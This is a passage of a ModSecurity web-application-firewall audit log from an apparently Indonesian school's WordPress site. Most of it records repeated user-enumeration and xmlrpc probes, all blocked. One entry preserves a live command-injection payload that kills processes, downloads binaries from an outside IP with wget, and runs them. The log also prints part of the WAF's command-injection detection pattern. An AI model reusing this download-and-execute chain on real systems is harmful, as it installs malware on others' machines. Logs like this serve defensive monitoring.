/xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6a98aa6b-C-- demo.sayHello --6a98aa6b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a98aa6b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746335062132811 5304 (- - -) Stopwatch2: 1746335062132811 5304; combined=3952, p1=533, p2=3204, p3=29, p4=33, p5=91, sr=74, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a98aa6b-Z-- --bf70c946-A-- [04/May/2025:12:16:41 +0700] aBb4OfnZiHJYHUAF8QfgJwAAAAY 103.236.140.4 48628 103.236.140.4 8181 --bf70c946-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bf70c946-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf70c946-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746335801941911 3271 (- - -) Stopwatch2: 1746335801941911 3271; combined=1454, p1=483, p2=940, p3=0, p4=0, p5=31, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf70c946-Z-- --a8522303-A-- [04/May/2025:12:16:47 +0700] aBb4P_nZiHJYHUAF8QfgKAAAAAc 103.236.140.4 48632 103.236.140.4 8181 --a8522303-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a8522303-C-- demo.sayHello --a8522303-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8522303-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746335807508576 16796 (- - -) Stopwatch2: 1746335807508576 16796; combined=27288, p1=469, p2=3261, p3=29, p4=40, p5=11758, sr=69, sw=62, l=0, gc=11669 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8522303-Z-- --9db4b254-A-- [04/May/2025:12:39:51 +0700] aBb9p_nZiHJYHUAF8QfgOwAAAA4 103.236.140.4 48912 103.236.140.4 8181 --9db4b254-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9db4b254-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9db4b254-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746337191387739 3257 (- - -) Stopwatch2: 1746337191387739 3257; combined=1430, p1=496, p2=900, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9db4b254-Z-- --4cb33844-A-- [04/May/2025:12:39:58 +0700] aBb9rtsVQyl9V2B8Pt-9EgAAAFg 103.236.140.4 48916 103.236.140.4 8181 --4cb33844-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4cb33844-C-- demo.sayHello --4cb33844-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cb33844-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746337198121624 5931 (- - -) Stopwatch2: 1746337198121624 5931; combined=4347, p1=600, p2=3508, p3=31, p4=35, p5=101, sr=82, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cb33844-Z-- --07258404-A-- [04/May/2025:13:15:29 +0700] aBcGAWJEE9ao5dcyYWnwfgAAAI4 103.236.140.4 49222 103.236.140.4 8181 --07258404-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --07258404-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07258404-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746339329270648 2505 (- - -) Stopwatch2: 1746339329270648 2505; combined=1042, p1=339, p2=680, p3=0, p4=0, p5=23, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07258404-Z-- --9c067455-A-- [04/May/2025:13:15:34 +0700] aBcGBuchPF6irSergtv9uQAAAMk 103.236.140.4 49226 103.236.140.4 8181 --9c067455-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9c067455-C-- demo.sayHello --9c067455-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c067455-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746339334549394 5921 (- - -) Stopwatch2: 1746339334549394 5921; combined=4290, p1=595, p2=3468, p3=28, p4=32, p5=98, sr=130, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c067455-Z-- --76ec9620-A-- [04/May/2025:13:24:11 +0700] aBcIC9sVQyl9V2B8Pt-9NAAAAE4 103.236.140.4 49278 103.236.140.4 8181 --76ec9620-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --76ec9620-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76ec9620-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746339851789361 2903 (- - -) Stopwatch2: 1746339851789361 2903; combined=1254, p1=440, p2=784, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76ec9620-Z-- --93388d64-A-- [04/May/2025:13:25:14 +0700] aBcISuchPF6irSergtv9wQAAANg 103.236.140.4 49288 103.236.140.4 8181 --93388d64-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --93388d64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93388d64-E-- --93388d64-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746339914036927 2501 (- - -) Stopwatch2: 1746339914036927 2501; combined=791, p1=486, p2=266, p3=0, p4=0, p5=38, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93388d64-Z-- --f2d91f0a-A-- [04/May/2025:13:26:59 +0700] aBcIs_nZiHJYHUAF8QfgXAAAABQ 103.236.140.4 49354 103.236.140.4 8181 --f2d91f0a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2d91f0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2d91f0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746340019280369 2330 (- - -) Stopwatch2: 1746340019280369 2330; combined=979, p1=329, p2=629, p3=0, p4=0, p5=21, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2d91f0a-Z-- --af620465-A-- [04/May/2025:13:27:02 +0700] aBcItvnZiHJYHUAF8QfgXgAAAAA 103.236.140.4 49370 103.236.140.4 8181 --af620465-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.89 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --af620465-C-- demo.sayHello --af620465-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --af620465-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746340022609974 5707 (- - -) Stopwatch2: 1746340022609974 5707; combined=4162, p1=572, p2=3352, p3=33, p4=45, p5=95, sr=85, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af620465-Z-- --888d3518-A-- [04/May/2025:13:43:29 +0700] aBcMkWJEE9ao5dcyYWnxIgAAAIQ 103.236.140.4 50508 103.236.140.4 8181 --888d3518-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --888d3518-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --888d3518-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746341009696669 2607 (- - -) Stopwatch2: 1746341009696669 2607; combined=1363, p1=463, p2=865, p3=0, p4=0, p5=35, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --888d3518-Z-- --f444d55f-A-- [04/May/2025:13:43:34 +0700] aBcMlmJEE9ao5dcyYWnxJAAAAIo 103.236.140.4 50512 103.236.140.4 8181 --f444d55f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.37 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f444d55f-C-- demo.sayHello --f444d55f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f444d55f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746341014610830 5769 (- - -) Stopwatch2: 1746341014610830 5769; combined=4226, p1=532, p2=3404, p3=33, p4=33, p5=156, sr=73, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f444d55f-Z-- --40f1db62-A-- [04/May/2025:13:43:42 +0700] aBcMnmJEE9ao5dcyYWnxJgAAAIw 103.236.140.4 50516 103.236.140.4 8181 --40f1db62-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40f1db62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40f1db62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746341022404668 2347 (- - -) Stopwatch2: 1746341022404668 2347; combined=1160, p1=388, p2=746, p3=0, p4=0, p5=26, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40f1db62-Z-- --be1dc248-A-- [04/May/2025:13:43:47 +0700] aBcMo2JEE9ao5dcyYWnxKAAAAJI 103.236.140.4 50520 103.236.140.4 8181 --be1dc248-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.178 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --be1dc248-C-- demo.sayHello --be1dc248-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --be1dc248-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746341027562655 4648 (- - -) Stopwatch2: 1746341027562655 4648; combined=3659, p1=431, p2=3028, p3=24, p4=26, p5=89, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be1dc248-Z-- --9a408a0e-A-- [04/May/2025:13:43:50 +0700] aBcMpuchPF6irSergtv9-wAAAMc 103.236.140.4 50528 103.236.140.4 8181 --9a408a0e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9a408a0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a408a0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746341030423485 2297 (- - -) Stopwatch2: 1746341030423485 2297; combined=1048, p1=372, p2=644, p3=0, p4=0, p5=31, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a408a0e-Z-- --f217e80a-A-- [04/May/2025:13:43:53 +0700] aBcMqWJEE9ao5dcyYWnxLAAAAIE 103.236.140.4 50532 103.236.140.4 8181 --f217e80a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.142 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; 